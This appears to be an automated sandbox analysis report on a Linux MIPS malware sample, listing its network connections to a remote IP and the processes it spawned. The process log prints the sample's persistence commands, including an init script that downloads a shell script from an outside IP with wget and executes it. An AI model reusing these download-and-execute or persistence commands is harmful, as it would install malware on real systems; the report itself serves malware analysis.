                                              Dec 24, 2024 05:19:49.285898924 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.405417919 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:49.405474901 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.405488968 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.524983883 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:49.911632061 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:50.074692011 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:50.527853012 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:50.528028965 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:50.913563013 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.033056021 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:51.033153057 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.033211946 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.152676105 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:51.539659023 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.702749968 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.154441118 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.154721022 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.541908979 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.661746025 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.661988020 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.661988020 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.781871080 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.169641972 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:53.330564022 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.796082020 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.796355963 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.171912909 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.293092966 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:54.293337107 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.293428898 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.412868977 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:54.802892923 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.967410088 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.427354097 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.427443981 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.805191994 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.927010059 CET382426016094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.927138090 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.927198887 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:56.046643972 CET382426016094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:56.434752941 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:56.594728947 CET382426016094.156.227.234192.168.2.23

                                              System Behavior

                                              Start time (UTC):04:17:50
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:/tmp/mipsel.nn.elf
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl enable custom.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/system
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/mipsel.nn.elf
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/mkdir
                                              Arguments:mkdir -p /etc/rc.d
                                              File size:88408 bytes
                                              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:50
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:17:52
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:52
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b